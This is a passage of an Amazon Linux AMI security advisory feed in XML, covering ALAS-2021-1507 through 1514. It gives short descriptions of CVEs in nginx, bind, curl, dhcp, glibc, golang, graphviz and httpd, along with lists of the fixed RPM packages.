arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-2.15.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.10-2.15.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.15.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.15.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.10-2.15.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-2.15.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.10-2.15.amzn1.i686.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-net-telnet-0.1.1-2.15.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-2.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1507</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1507: important priority package update for nginx</title><issued date="2021-06-01 17:58:00" /><updated date="2021-06-02 00:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23017:
A flaw was found in nginx. An off-by-one error while processing DNS responses allows a network attacker to write a dot character out of bounds in a heap-allocated buffer, which can allow overwriting the least significant byte of the next heap chunk's metadata, likely leading to remote code execution in certain circumstances. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1963121: CVE-2021-23017 nginx: Off-by-one in ngx_resolver_copy() when labels are followed by a pointer to a root domain name
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23017" title="" id="CVE-2021-23017" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-image-filter-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-perl" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-perl-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-xslt-filter-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-stream-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-mail" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-mail-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-geoip-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-all-modules" version="1.18.0" release="1.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-all-modules-1.18.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.18.0" release="1.43.amzn1" epoch="1" 
arch="i686"><filename>Packages/nginx-mod-stream-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-mod-mail" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-mail-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-image-filter-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-perl" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-perl-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-xslt-filter-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-all-modules" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-all-modules-1.18.0-1.43.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.18.0" release="1.43.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-geoip-1.18.0-1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1508</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1508: important priority package update for bind</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the 
following vulnerabilities:
CVE-2021-25215:
A flaw was found in bind. The way DNAME records are processed may cause the same RRset to be added to the ANSWER section more than once, which causes an assertion check to fail. The highest threat from this flaw is to system availability.
1953857: CVE-2021-25215 bind: An assertion check can fail while answering queries for DNAME records that require the DNAME to be processed to resolve itself
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25215" title="" id="CVE-2021-25215" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-chroot" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.87.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.87.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.87.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1509</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1509: medium priority package update for curl</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-22898:
A vulnerability was found in curl where, due to a flaw in the option parser for sending NEW_ENV variables, libcurl can pass uninitialized data from a stack-based buffer to the server. This issue potentially reveals sensitive internal information to the server over a clear-text network protocol. The highest threat from this vulnerability is to confidentiality.
1964887: CVE-2021-22898 curl: TELNET stack contents disclosure
CVE-2021-22876:
It was discovered that libcurl did not remove authentication credentials from URLs when automatically populating the Referer HTTP request header while handling HTTP redirects. This could lead to exposure of the credentials to the server to which requests were redirected.
1941964: CVE-2021-22876 curl: Leak of authentication credentials in URL via automatic Referer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22876" title="" id="CVE-2021-22876" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22898" title="" id="CVE-2021-22898" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.61.1" release="12.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.98.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.98.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.98.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.98.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.98.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.98.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.98.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.98.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="12.98.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.98.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.98.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.98.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1510</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1510: important priority package update for dhcp</title><issued date="2021-07-08 
18:38:00" /><updated date="2021-07-12 21:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-25217:
A flaw was found in the Dynamic Host Configuration Protocol (DHCP). There is a discrepancy between the code that handles encapsulated option information in leases transmitted "on the wire" and the code which reads and parses lease information after it has been written to disk storage. This flaw allows an attacker to deliberately cause a situation where dhcpd (running in DHCPv4 or DHCPv6 mode) or dhclient attempts to read a stored lease that contains option information, triggering a stack-based buffer overflow in the option parsing code for colon-separated hex digit values. The highest threat from this vulnerability is to data confidentiality and integrity as well as service availability.
1963258: CVE-2021-25217 dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or lease files in dhcpd and dhclient
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25217" title="" id="CVE-2021-25217" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dhcp" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-53.P1.29.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-53.P1.29.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-53.P1.29.amzn1.x86_64.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-53.P1.29.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-53.P1.29.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-53.P1.29.amzn1.i686.rpm</filename></package><package name="dhcp" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-53.P1.29.amzn1.i686.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-devel-4.1.1-53.P1.29.amzn1.i686.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-53.P1.29.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="53.P1.29.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-53.P1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1511</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1511: medium priority package update for glibc</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-29573:
A stack buffer overflow flaw was found in glibc in the way the printf family of functions processed an 80-bit long double with a non-canonical bit pattern. This flaw allows an attacker who can control the arguments of these functions with the non-standard long double pattern to trigger an overflow and cause an application crash. The highest threat from this vulnerability is to system availability.
1905213: CVE-2020-29573 glibc: stack-based buffer overflow if the input to any of the printf family of functions is an 80-bit long double with a non-canonical bit pattern
CVE-2020-10029:
A flaw was found in glibc in versions prior to 2.32. Pseudo-zero values are not validated, causing stack corruption due to a stack-based overflow. The highest threat from this vulnerability is to system availability.
1810670: CVE-2020-10029 glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions
CVE-2019-25013:
A flaw was found in glibc. When processing input in the EUC-KR encoding, an invalid input sequence could cause glibc to read beyond the end of a buffer, resulting in a segmentation fault. The highest threat from this vulnerability is to system availability.
1912960: CVE-2019-25013 glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding
CVE-2019-19126:
A vulnerability was discovered in glibc where the LD_PREFER_MAP_32BIT_EXEC environment variable is not ignored when running binaries with the setuid flag on x86_64 architectures. This allows an attacker to force the system to utilize only half of the memory (making the system think the software is 32-bit only), thus lowering the amount of memory being used with address space layout randomization (ASLR). The highest threat is to confidentiality, although the complexity of the attack is high. The affected application must already have other vulnerabilities for this flaw to be usable.
1774681: CVE-2019-19126 glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126" title="" id="CVE-2019-19126" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013" title="" id="CVE-2019-25013" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029" title="" id="CVE-2020-10029" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29573" title="" id="CVE-2020-29573" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nscd" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-322.181.amzn1.x86_64.rpm</filename></package><package 
name="glibc-utils" version="2.17" release="322.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-322.181.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-322.181.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-322.181.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="322.181.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-322.181.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1512</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1512: medium priority package update for golang</title><issued date="2021-07-08 18:38:00" 
/><updated date="2021-07-12 21:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-31525:
A vulnerability was found in net/http of the Go standard library when parsing very large HTTP header values, causing a crash and subsequent denial of service. This vulnerability affects both clients and servers written in Go; however, servers are only vulnerable if the default 1 MB value for MaxHeaderBytes is increased.
1958341: CVE-2021-31525 golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31525" title="" id="CVE-2021-31525" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.15.12" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.15.12-1.67.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.15.12" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.15.12-1.67.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.15.12" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.15.12-1.67.amzn1.noarch.rpm</filename></package><package name="golang" version="1.15.12" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.15.12-1.67.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.15.12" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.15.12-1.67.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.15.12" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.15.12-1.67.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.15.12" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.15.12-1.67.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.15.12" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.15.12-1.67.amzn1.i686.rpm</filename></package><package name="golang" version="1.15.12" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.15.12-1.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1513</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1513: medium priority 
package update for graphviz</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-18032:
A flaw was found in graphviz. A wrong assumption in the record_init function leads to an off-by-one write in the parse_reclbl function, allowing an attacker who can provide graph input to potentially execute code when the label of a node is invalid and shorter than two characters. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1966272: CVE-2020-18032 graphviz: off-by-one in parse_reclbl() in lib/common/shapes.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-18032" title="" id="CVE-2020-18032" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-devel" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-devel-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-lua" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-lua-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-tcl" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-tcl-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-perl" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-perl-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-python26" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python26-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-gd" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-gd-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-guile" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-guile-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-graphs" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-graphs-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-R" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-R-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-java" version="2.38.0" release="18.52.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/graphviz-java-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-ruby" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-ruby-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-doc" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-doc-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-debuginfo" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-debuginfo-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-php54" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php54-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-python27" version="2.38.0" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python27-2.38.0-18.52.amzn1.x86_64.rpm</filename></package><package name="graphviz-python27" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-python27-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-guile" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-guile-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-doc" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-doc-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-devel" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-devel-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-python26" version="2.38.0" release="18.52.amzn1" epoch="0" 
arch="i686"><filename>Packages/graphviz-python26-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-ruby" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-ruby-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-php54" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php54-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-tcl" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-tcl-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-R" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-R-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-java" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-java-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-lua" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-lua-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-graphs" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-graphs-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-debuginfo" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-debuginfo-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-gd" version="2.38.0" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-gd-2.38.0-18.52.amzn1.i686.rpm</filename></package><package name="graphviz-perl" version="2.38.0" release="18.52.amzn1" epoch="0" 
arch="i686"><filename>Packages/graphviz-perl-2.38.0-18.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1514</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1514: medium priority package update for httpd24</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-30641:
A flaw was found in Apache httpd. A possible regression from an earlier security fix broke behavior of MergeSlashes. The highest threat from this vulnerability is to data integrity.
1966743: CVE-2021-30641 httpd: MergeSlashes regression
CVE-2021-26691:
A heap overflow flaw was found in Apache httpd mod_session. The highest threat from this vulnerability is to system availability.
